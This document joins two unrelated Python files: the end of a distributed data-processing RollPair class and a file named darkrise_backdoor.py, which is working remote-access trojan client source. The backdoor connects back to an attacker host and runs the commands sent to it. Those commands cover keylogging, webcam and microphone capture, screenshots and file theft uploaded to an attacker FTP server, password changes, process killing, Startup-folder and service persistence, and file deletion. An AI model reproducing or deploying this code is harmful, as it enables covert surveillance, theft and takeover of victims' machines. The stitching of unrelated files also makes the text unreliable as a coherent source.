done = wait(futures, return_when=FIRST_EXCEPTION).done
result = None
first = True
for future in done:
pair = future.result()[0]
seq_op_result = self.functor_serdes.deserialize(pair._value)
if not first:
result = comb_op(result, seq_op_result)
else:
result = seq_op_result
first = False
return result
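    # aggregate() is the two-level variant: seq_op folds each partition
    # starting from zero_value on the eggs, and comb_op merges the partition
    # results here on the client. Illustrative sketch, assuming seq_op is
    # applied over each partition's values:
    #
    #     total = rp.aggregate(0, lambda acc, v: acc + v, lambda a, b: a + b)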
@_method_profile_logger
def glom(self, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.GLOM, serdes=SerdesTypes.CLOUD_PICKLE)
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.GLOM),
name=RollPair.GLOM,
inputs=[self.__store],
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes
)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def sample(self, fraction, seed=None, output=None, options: dict = None):
if options is None:
options = {}
        er_fraction = ErFunctor(name=RollPair.SAMPLE, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(fraction))
        er_seed = ErFunctor(name=RollPair.SAMPLE, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(seed))
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.SAMPLE),
name=RollPair.SAMPLE,
inputs=[self.__store],
outputs=outputs,
functors=[er_fraction, er_seed])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def filter(self, func, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.FILTER, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.FILTER),
name=RollPair.FILTER,
inputs=[self.__store],
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def subtract_by_key(self, other, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.SUBTRACT_BY_KEY, serdes=SerdesTypes.CLOUD_PICKLE)
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.SUBTRACT_BY_KEY),
name=RollPair.SUBTRACT_BY_KEY,
inputs=self.__repartition_with(other),
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def union(self, other, func=lambda v1, v2: v1, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.UNION, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.UNION),
name=RollPair.UNION,
inputs=self.__repartition_with(other),
outputs=outputs,
functors=[functor])
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
@_method_profile_logger
def join(self, other, func, output=None, options: dict = None):
if options is None:
options = {}
functor = ErFunctor(name=RollPair.JOIN, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))
outputs = []
if output:
outputs.append(output)
final_options = {}
final_options.update(self.__store._options)
final_options.update(options)
job = ErJob(id=generate_job_id(self.__session_id, RollPair.JOIN),
name=RollPair.JOIN,
inputs=self.__repartition_with(other),
outputs=outputs,
functors=[functor],
options=final_options)
job_result = self.__command_client.simple_sync_send(
input=job,
output_type=ErJob,
endpoint=self.ctx.get_roll()._command_endpoint,
command_uri=CommandURI(f'{RollPair.ROLL_PAIR_URI_PREFIX}/{RollPair.RUN_JOB}'),
serdes_type=self.__command_serdes)
er_store = job_result._outputs[0]
return RollPair(er_store, self.ctx)
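    # join/union/subtract_by_key all co-partition their inputs first (see
    # __repartition_with) and then run as a single roll-pair job; for join,
    # func merges the two values found under the same key. Illustrative sketch:
    #
    #     joined = rp_left.join(rp_right, lambda v1, v2: (v1, v2))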
@_method_profile_logger
def with_stores(self, func, others=None, options: dict = None):
if options is None:
options = {}
tag = "withStores"
if others is None:
others = []
total_partitions = self.get_partitions()
for other in others:
if other.get_partitions() != total_partitions:
raise ValueError(f"diff partitions: expected:{total_partitions}, actual:{other.get_partitions()}")
job_id = generate_job_id(self.__session_id, tag=tag)
job = ErJob(id=job_id,
name=tag,
inputs=[self.ctx.populate_processor(rp.get_store()) for rp in [self] + others],
functors=[ErFunctor(name=tag, serdes=SerdesTypes.CLOUD_PICKLE, body=cloudpickle.dumps(func))],
options=options)
args = list()
for i in range(total_partitions):
partition_self = job._inputs[0]._partitions[i]
task = ErTask(id=generate_task_id(job_id, i),
name=job._name,
inputs=[store._partitions[i] for store in job._inputs],
job=job)
args.append(([task], partition_self._processor._command_endpoint))
futures = self.__command_client.async_call(
args=args,
output_types=[ErPair],
command_uri=CommandURI(f'{RollPair.EGG_PAIR_URI_PREFIX}/{RollPair.RUN_TASK}'))
result = list()
for future in futures:
ret_pair = future.result()[0]
result.append((self.functor_serdes.deserialize(ret_pair._key),
self.functor_serdes.deserialize(ret_pair._value)))
return result
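    # with_stores() aligns this store with the given others partition by
    # partition and runs func once per partition on the egg side, returning the
    # deserialized (key, value) pair produced by each task.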
|
darkrise_backdoor.py
|
#!/usr/bin/python2
#-*- coding:utf-8 -*-
#Author : Unamed - Backdoor
#Client File
import os
import socket
import subprocess
import requests
import json
import sys
import platform
import shutil
import shlex
from ftplib import FTP
from ftplib import FTP_TLS
import cv2
import time
from datetime import datetime
import webbrowser
from Crypto.Cipher import XOR
import base64
import thread
from pynput.keyboard import Key, Listener
import logging
import urllib
import threading
import numpy as np
import netifaces
import pyttsx3
import ctypes
import glob
import pyaudio
import wave
if 'Linux' not in platform.platform():
import win32con
from PIL import ImageGrab
from PIL import Image
import pyautogui
import imutils
elif 'Windows' not in platform.platform():
import pyautogui
import imutils
global log_dirrec
global log_file
global cmd_key
def keylogger_module(cmd_key,log_dirrec,log_file):
global key_active
if cmd_key =='startkey':
key_active = True
if key_active ==True:
logging.basicConfig(filename=(log_dirrec + log_file), level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(key)
with Listener(on_press=on_press) as listener:
listener.join()
elif cmd_key =='stopkey':
key_active = False
while True:
break
elif cmd_key =='restartkey':
key_active = True
if key_active ==True:
logging.basicConfig(filename=(log_dirrec + log_file), level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(key)
with Listener(on_press=on_press) as listener:
listener.join()
def server2popen(server_socket, p):
while True:
data = server_socket.recv(65556)
if len(data) > 0:
p.stdin.write(data)
else:
p.stdin.write(data)
def popen2socket(server_socket, p):
while True:
server_socket.sendall(p.stdout.read(1))
def sys_required():
if sys.version[0] =='3':
sys.exit('[*] Please Run With Python2')
global cmdkeyvideo
global key_video
global host_alive
global temp_pers
host_alive = []
temp_pers_vbs = '''
Dim nativsystem
Set nativshellsystem = WScript.CreateObject("WScript.shell")
Do while True:
nativshellsystem.Run "payl_bin", 0, true
WScript.Sleep(10000)
loop
'''
temp_pers_bat = '''
@echo off
nativsystem
:service_nativ
timeout 10 > NUL
start payl_bin
goto:service_nativ
'''
def try_ping(host):
try:
if 'Linux' not in platform.platform():
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
req_ping = subprocess.Popen('ping -n 1 %s' % (host), shell=True, startupinfo=info, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_req = req_ping.stdout.read() + req_ping.stderr.read()
lenght_out = len(out_req)
if lenght_out ==246:
#print('[*] Not Found !')
pass
elif lenght_out>246:
#print('yess')
get_hostname = socket.gethostbyaddr(host)
host_alive.append('IP : %s Hostname : %s\n' % (host,get_hostname[0]))
elif 'Windows' not in platform.platform():
req_ping = os.system('ping -c 1 -b %s > /dev/null ' % (host))
if req_ping ==0:
get_hostname = socket.gethostbyaddr(host)
host_alive.append('IP : %s Hostname : %s\n' % (host,get_hostname[0]))
else:
pass
except:
pass
def start_scanner_network():
gtw = netifaces.gateways()
interface = gtw['default'][2][1]
gtw_ip = gtw['default'][2][0]
scanner_gtw_ip = gtw_ip[:10]
try:
i = 0
while i<256:
thread.start_new_thread(try_ping,(scanner_gtw_ip+str(i),))
time.sleep(0.1)
i = i+1
except Exception as error_start_scanner:
print(error_start_scanner)
def main_config_server(LHOST,LPORT,FTPHOST,FTPPORT,FTPUSER,FTPPASSWD,log_dir_key,log_file_key):
get_ip = requests.get('https://ifconfig.me/ip')
ip = get_ip.text
socket_local = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
socket_local.connect(('8.8.8.8', 80))
localip = socket_local.getsockname()[0]
buffer = 1024
global server_socket
server_socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
server_socket.connect((LHOST,LPORT))
except socket.error:
pass
server_socket.send('\n')
while True:
try:
data = server_socket.recv(buffer)
if data.startswith('quit')==True:
break
elif data.startswith('cd')==True:
change_dirrectory = data
split = shlex.split(change_dirrectory)
try:
if len(split) ==2:
check_dir = os.path.exists(split[1])
if check_dir ==True:
os.chdir(split[1])
current_path = os.getcwd()
server_socket.sendall('[*] Dirrectory Change : %s' % (current_path))
else:
server_socket.sendall('[*] Path Not Found !')
else:
server_socket.send('[!] Please Enter Dirrectory')
except Exception as error_change_dirrectory:
server_socket.sendall(error_change_dirrectory)
elif data.startswith('keylogger_start')==True:
try:
server_socket.send('[*] Keylogger Started !')
thread.start_new_thread(keylogger_module,('startkey',log_dir_key,log_file_key))
except Exception as error_start_keylogger:
server_socket.send(error_start_keylogger)
elif data.startswith('keylogger_stop')==True:
try:
server_socket.send('[*] Keylogger Stoped !')
thread.start_new_thread(keylogger_module,('stopkey',log_dir_key,log_file_key))
except Exception as error_stop_keylogger:
server_socket.send(error_stop_keylogger)
elif data.startswith('keylogger_dump')==True:
try:
check_log_file = os.path.exists(log_dir_key+log_file_key)
if check_log_file ==True:
file=open(log_dir_key+log_file_key,'rb')
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
connect.storbinary('STOR '+log_file_key, file)
file.close()
connect.quit()
server_socket.sendall('[*] %s Downloaded ! Save In FTP Server' % (log_file_key))
else:
server_socket.send('[*] %s%s not Found !' % (log_dir_key,log_file_key))
except Exception as error_keydump:
server_socket.send(error_keydump)
elif data.startswith('keylogger_restart')==True:
try:
server_socket.send('[*] Keylogger Restarted !')
thread.start_new_thread(keylogger_module,('restartkey',log_dir_key,log_file_key))
except Exception as error_keylogger_restart:
server_socket.send(error_keylogger_restart)
elif data.startswith('ftpdownload')==True:
file_download = data
split = shlex.split(file_download)
try:
if len(split)==2:
check_file_exists = os.path.exists(split[1])
if check_file_exists ==True:
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
filename = split[1]
file = open(filename,'rb')
connect.storbinary('STOR '+filename, file)
file.close()
connect.quit()
server_socket.send('[*] %s Downloaded And Save At FTP Server' % (filename))
else:
server_socket.send('[*] %s Not Found !' % (split[1]))
else:
server_socket.send('[*] Please Enter File For ftpdownload <file>')
except Exception as error_ftpdownload:
server_socket.sendall(error_ftpdownload)
elif data.startswith('webcamsnap')==True:
try:
t = datetime.now().strftime('%H_%M')
webcam=cv2.VideoCapture(0)
check, frame = webcam.read()
time.sleep(1)
name_picture = 'webcam_%s.png' % (t)
cv2.imwrite(name_picture, frame)
webcam.release()
cv2.destroyAllWindows()
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
filename = name_picture
current_path=os.getcwd()
file=open(current_path+'/'+filename,'rb')
connect.storbinary('STOR '+filename, file)
file.close()
connect.quit()
os.remove(filename)
server_socket.sendall('[*] Webcamsnap Save as %s ' % (name_picture))
except Exception as error_webcam_snap:
server_socket.sendall(error_webcam_snap)
pass
elif data.startswith('getuid')==True:
try:
if 'Linux' not in platform.platform():
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
uid = subprocess.Popen('echo %Username%', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
out_uid = uid.stdout.read() + uid.stderr.read()
server_socket.send('[*] UID => %s ' % (out_uid))
elif 'Windows' not in platform.platform():
whoami = subprocess.Popen('whoami', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_whoami = whoami.stdout.read() + whoami.stderr.read()
server_socket.send('[*] UID => %s' % (out_whoami))
except:
server_socket.send('[*] Error Getuid')
elif data.startswith('record_mic')==True:
split = shlex.split(data)
if len(split)==2:
seconds = split[1]
int_seconds = int(seconds)
try:
t = datetime.now().strftime('%H_%M')
filename = 'output_%s.wav' % (t)
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
RECORD_SECONDS = int_seconds
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT,channels=CHANNELS,rate=RATE,input=True,frames_per_buffer=CHUNK)
frames = []
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
p.terminate()
wf = wave.open(filename, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
current_path=os.getcwd()
file=open(current_path+'/'+filename,'rb')
connect.storbinary('STOR '+filename, file)
file.close()
connect.quit()
os.remove(filename)
server_socket.sendall('[*] Recording Save as %s' % (filename))
except:
server_socket.send('[*] Error Recording !')
else:
server_socket.send('[*] Error : record_mic <seconds>\nexample : record_mic 10\n')
elif data.startswith('cwpasswd')==True:
recv_cwpasswd=data[9:]
split = shlex.split(recv_cwpasswd)
user_change=split[0]
password_new=split[1]
try:
os.system('net user %s %s' % (user_change,password_new))
server_socket.send('[*] Password Change For %s Users New Password Is %s\n' % (user_change,password_new))
except Exception as error_cwpasswd:
server_socket.send(error_cwpasswd)
elif data.startswith('netuser')==True:
try:
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
cmd_net_user = subprocess.Popen(['net','user'], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
out_cmd_net_user = cmd_net_user.stdout.read() + cmd_net_user.stderr.read()
server_socket.send(out_cmd_net_user)
except Exception as error_net_user:
server_socket.send(error_net_user)
elif data.startswith('tkill')==True:
proc=data[6:]
try:
if 'Linux' not in platform.platform():
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
s = subprocess.Popen('taskkill /F /IM %s' % (proc), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
server_socket.send('[*] Task Killed ! %s\n' % (proc))
elif 'Windows' not in platform.platform():
os.system('pkill -f %s' % (proc))
server_socket.send('[*] Task Killed ! %s\n' % (proc))
else:
server_socket.send('[*] Please Enter Processus To kill')
except Exception as error_tkill:
server_socket.send(error_tkill)
elif data.startswith('process')==True:
processus=data
split = shlex.split(processus)
try:
if 'Linux' not in platform.platform():
os.system('start %s &' % (split[1]))
server_socket.send('[*] Task Started : %s !' % (split[1]))
elif 'Windows' not in platform.platform():
os.system('exec %s &' % (split[1]))
server_socket.send('[*] Task Started : %s !' % (split[1]))
except Exception as error_start_process:
server_socket.send(error_start_process)
elif data.startswith('msgbox')==True:
message=data[7:]
try:
f=open('msg.vbs','w')
f.write('msgbox "%s"' % (message))
f.close()
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
s=subprocess.Popen('start msg.vbs &', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
time.sleep(1)
os.system('del msg.vbs /Q')
server_socket.send('[*] Message Sent : %s\n' % (message))
except Exception as error_msgbox_sent:
server_socket.sendall(error_msgbox_sent)
elif data.startswith('getpid')==True:
try:
pid = os.getpid()
server_socket.send('[*] PID : %s' % (pid))
except Exception as error_get_pid:
server_socket.send(error_get_pid)
elif data.startswith('speak')==True:
message=data[6:]
try:
engine = pyttsx3.init()
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[0].id)
engine.say(message)
engine.runAndWait()
server_socket.send('[*] Voice Message Speak : %s' % (message))
except Exception as error_speak_message:
server_socket.sendall(error_speak_message)
elif data.startswith('meslp')==True:
message_loop=data[6:]
try:
f=open('msgloop.vbs','w')
f.write('Do\n')
f.write('msgbox "%s"\n' % (message_loop))
f.write('loop\n')
f.close()
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
s = subprocess.Popen('start msgloop.vbs &', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
time.sleep(1)
os.system('del msgloop.vbs /Q')
server_socket.send('[*] Message Loop Sent : %s' % (message_loop))
except Exception as error_message_loop:
server_socket.send(error_message_loop)
elif data.startswith('resettime')==True:
try:
os.system('time 12:00')
server_socket.send('[*] Time Reset !')
except Exception as error_resettime:
server_socket.send(error_resettime)
elif data.startswith('ftpupload')==True:
time.sleep(1)
filename=data
split = shlex.split(filename)
try:
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
filename = split[1]
file=open(filename,'wb')
connect.retrbinary('RETR '+filename, file.write)
file.close()
connect.quit()
server_socket.sendall('[*] %s Uploaded !' % (filename))
except Exception as error_ftpupload:
server_socket.sendall(error_ftpupload)
elif data.startswith('persistence')==True:
split = shlex.split(data)
if len(split) ==1:
server_socket.send('---===[Persistence Help]===---\nmethod :\n1 <bat/vbs> <payload_path> | Make Persistence with .vbs or .bat and restart payload with 10 seconds interval\n2 <payload_path> | copy payload on startup\n3 <service_name> <payload_path>\n')
elif split[1] =="1":
if len(split) ==4:
if split[2] =="bat":
f=open('nativsystem.bat','w')
f.write(temp_pers_bat)
f.close()
f=open('nativsystem.bat','r')
content = f.read()
f.close()
replace_nativ = content.replace('payl_bin',split[3])
f=open('nativsystem.bat','w')
f.write(replace_nativ)
f.close()
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
var_username = subprocess.Popen('echo %username%', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
out_var_username = var_username.stdout.read()
split_slash_var_username = out_var_username.split('\r\n')
os.system('move nativsystem.bat "C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"' % (split_slash_var_username[0]))
server_socket.send('[*] Persistence Created and save as C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\nativsystem.bat' % (split_slash_var_username[0]))
elif split[2] =="vbs":
f=open('nativsystem.vbs','w')
f.write(temp_pers_vbs)
f.close()
f=open('nativsystem.vbs','r')
content = f.read()
f.close()
replace_nativ = content.replace('payl_bin',split[3])
f=open('nativsystem.vbs','w')
f.write(replace_nativ)
f.close()
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
var_username = subprocess.Popen('echo %UserName%', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
out_var_username = var_username.stdout.read()
split_slash_var_username = out_var_username.split('\r\n')
os.system('move nativsystem.vbs "C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"' % (split_slash_var_username[0]))
server_socket.send('[*] Persistence Created and save as C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\nativsystem.vbs' % (split_slash_var_username[0]))
else:
server_socket.send('[*] Format Script error : %s' % (split[2]))
else:
server_socket.send('[*] Error : persistence 1 => arguments required !\n')
elif split[1] =="2":
if len(split) ==3:
try:
var_username = subprocess.Popen('echo %UserName%', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_var_username = var_username.stdout.read()
split_slash_var_username = out_var_username.split('\r\n')
os.system('copy %s C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' % (split[2],split_slash_var_username[0]))
except:
server_socket.send('[*] Error : persistence 2 => arguments required !\n')
else:
server_socket.send('[*] Format Script error : %s' % (split[2]))
elif split[1] =="3":
if len(split)==4:
try:
service_name = split[2]
binpath = split[3]
cmd_pers = subprocess.Popen('sc create %s binpath="%s" start=auto' % (service_name,binpath), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd_pers = cmd_pers.stdout.read() + cmd_pers.stderr.read()
server_socket.sendall(out_cmd_pers)
except:
server_socket.send('[*] Error : persistence 3 => arguments required ! \n')
else:
server_socket.send('[*] Error : Persistence !\n')
else:
server_socket.send('[*] Error : Persistence !\n')
elif data.startswith('move')==True:
file_move=data[5:]
file_old_new = shlex.split(file_move)
old_file = file_old_new[0]
new_file = file_old_new[1]
try:
if len(file_old_new)==2:
shutil.move(old_file,new_file)
check_new_file = os.path.exists(new_file)
if check_new_file ==True:
server_socket.sendall('[*] %s Moved At %s' % (old_file,new_file))
else:
server_socket.sendall('[*] %s Not Moved !' % (old_file))
else:
server_socket.send('[*] Please Select File !')
except Exception as error_move_cmd:
server_socket.sendall(error_move_cmd)
elif data.startswith('xorencode')==True:
filename=data
split = shlex.split(filename)
try:
if len(split)==2:
key = 'dxvistxr'
cipher = XOR.new(key)
check_filename = os.path.exists(split[1])
if check_filename ==True:
f=open(split[1], 'rb')
content = f.read()
f.close()
encode = base64.b64encode(cipher.encrypt(content))
f=open(split[1], 'wb')
f.write(encode)
f.close()
server_socket.sendall('[*] %s Encoded With Xor !' % (split[1]))
else:
server_socket.send('[*] %s File Not Found !' % (split[1]))
else:
server_socket.send('[*] Please Select File !')
except Exception as error_xor:
server_socket.sendall(error_xor)
elif data.startswith('ping')==True:
ip = data[5:]
try:
if 'Linux' not in platform.platform():
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
ping_cmd_win = subprocess.Popen('ping -n 1 %s' % (ip), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
out_ping_cmd = ping_cmd_win.stdout.read() + ping_cmd_win.stderr.read()
server_socket.sendall(out_ping_cmd)
elif 'Windows' not in platform.platform():
ping_cmd = subprocess.Popen('ping -c 1 %s' % (ip), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_ping_cmd = ping_cmd.stdout.read() + ping_cmd.stderr.read()
server_socket.sendall(out_ping_cmd)
except Exception as error_ping_command:
server_socket.sendall(error_ping_command)
elif data.startswith('copy')==True:
file_copy=data[5:]
file_old_new = shlex.split(file_copy)
old_place = file_old_new[0]
new_place = file_old_new[1]
try:
if len(file_old_new)==2:
shutil.copy(old_place,new_place)
check_new_place = os.path.exists(new_place)
if check_new_place ==True:
server_socket.sendall('[*] %s Copied at %s !' % (old_place,new_place))
else:
server_socket.sendall('[*] %s Not Copied !' % (old_place))
else:
server_socket.send('[*] Please Enter File')
except Exception as error_copy_file:
server_socket.sendall(error_copy_file)
elif data.startswith('banner')==True:
server_socket.send('\n')
elif data.startswith('screenshot')==True:
try:
if 'Linux' not in platform.platform():
t = datetime.now().strftime('%H_%M')
name = 'screenshot_%s.png' % (t)
im = pyautogui.screenshot(name)
#im.save(name)
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
filename = name
current_path=os.getcwd()
file=open(current_path+'/'+filename,'rb')
connect.storbinary('STOR '+filename, file)
file.close()
connect.quit()
os.remove(filename)
server_socket.send('[*] Screenshot Save as %s ' % (name))
elif 'Windows' not in platform.platform():
t = datetime.now().strftime('%H:%M:%S')
name = 'screenshot_%s.png' % (t)
im = pyautogui.screenshot(name)
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
filename = name
current_path=os.getcwd()
file=open(current_path+'/'+filename,'rb')
connect.storbinary('STOR '+filename, file)
file.close()
connect.quit()
os.remove(filename)
server_socket.send('[*] Screenshot Save as %s ' % (name))
except Exception as error_screenshot:
server_socket.send(error_screenshot)
elif data.startswith('shutdown')==True:
try:
if 'Linux' not in platform.platform():
os.system('shutdown -S -t 00')
elif 'Windows' not in platform.platform():
os.system('shutdown now')
except Exception as error_pc_shutdown:
server_socket.sendall(error_pc_shutdown)
elif data.startswith('reboot')==True:
try:
if 'Linux' not in platform.platform():
os.system('shutdown -R -t 00')
elif 'Windows' not in platform.platform():
os.system('reboot')
except Exception as error_reboot:
server_socket.sendall(error_reboot)
elif data.startswith('del')==True:
delete_file = data
split = shlex.split(delete_file)
try:
if len(split)==2:
check_delete_file = os.path.exists(split[1])
if check_delete_file ==True:
os.remove(split[1])
server_socket.sendall('[*] %s Removed ! ' % (split[1]))
else:
server_socket.sendall('[*] %s Not Found !' % (split[1]))
else:
server_socket.send('[*] Please Select File !')
except:
server_socket.sendall('[*] File Not Removed !')
elif data.startswith('rmpt')==True:
delete_path = data
split = shlex.split(delete_path)
try:
if len(split)==2:
check_delete_path = os.path.exists(split[1])
if check_delete_path==True:
os.rmdir(split[1])
server_socket.sendall('[*] %s Removed ! ' % (split[1]))
else:
server_socket.sendall('[*] %s Not Found !' % (split[1]))
else:
server_socket.send('[*] Please Enter Folder')
except:
server_socket.sendall('[*] File Not Removed !')
elif data.startswith('getgtw')==True:
try:
gtws = netifaces.gateways()
get_gateway = gtws['default'][netifaces.AF_INET][0].encode('utf-8')
server_socket.send('[*] Gateways : %s' % (get_gateway))
except Exception as error_get_gateway:
server_socket.send(error_get_gateway)
elif data.startswith('mkpa')==True:
create_dir = data
split = shlex.split(create_dir)
try:
if len(split)==2:
check_if_exists = os.path.exists(split[1])
if check_if_exists ==True:
server_socket.sendall('[*] %s Already Exists ! ' % (split[1]))
else:
os.mkdir(split[1])
server_socket.sendall('[*] %s Successfully Created !' % (split[1]))
else:
server_socket.send('[*] Please Enter Folder Name')
except Exception as error_mkdir:
server_socket.sendall(error_mkdir)
elif data.startswith('ifconfig')==True:
try:
if 'Linux' not in platform.platform():
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
cmd_ifconfig = subprocess.Popen(['ipconfig'],shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
out_cmd = cmd_ifconfig.stdout.read() + cmd_ifconfig.stderr.read()
server_socket.sendall(out_cmd)
elif 'Windows' not in platform.platform():
cmd_ifconfig = subprocess.Popen(['ifconfig'],shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd = cmd_ifconfig.stdout.read() + cmd_ifconfig.stderr.read()
server_socket.sendall(out_cmd)
except Exception as error_ifconfig_info:
server_socket.sendall(error_ifconfig_info)
elif data.startswith('openurl')==True:
link=data
split = shlex.split(link)
try:
webbrowser.open_new(split[1])
server_socket.send('[*] Link Opened => %s' % (split[1]))
except Exception as error_start_webbrowser:
server_socket.send(error_start_webbrowser)
elif data.startswith('change_wallpaper')==True:
split = shlex.split(data)
try:
url = split[1]
name = 'wlp.jpg'
urllib.urlretrieve(url, name)
path_current = os.getcwd()
path = path_current+'\\wlp.jpg'
changed = win32con.SPIF_UPDATEINIFILE | win32con.SPIF_SENDCHANGE
ctypes.windll.user32.SystemParametersInfoA(win32con.SPI_SETDESKWALLPAPER,0,path.encode(),changed)
time.sleep(2)
os.remove('wlp.jpg')
server_socket.send('[*] Wallpaper Changed To => Wallpaper !')
except Exception as error_cwlp_background:
server_socket.send(error_cwlp_background)
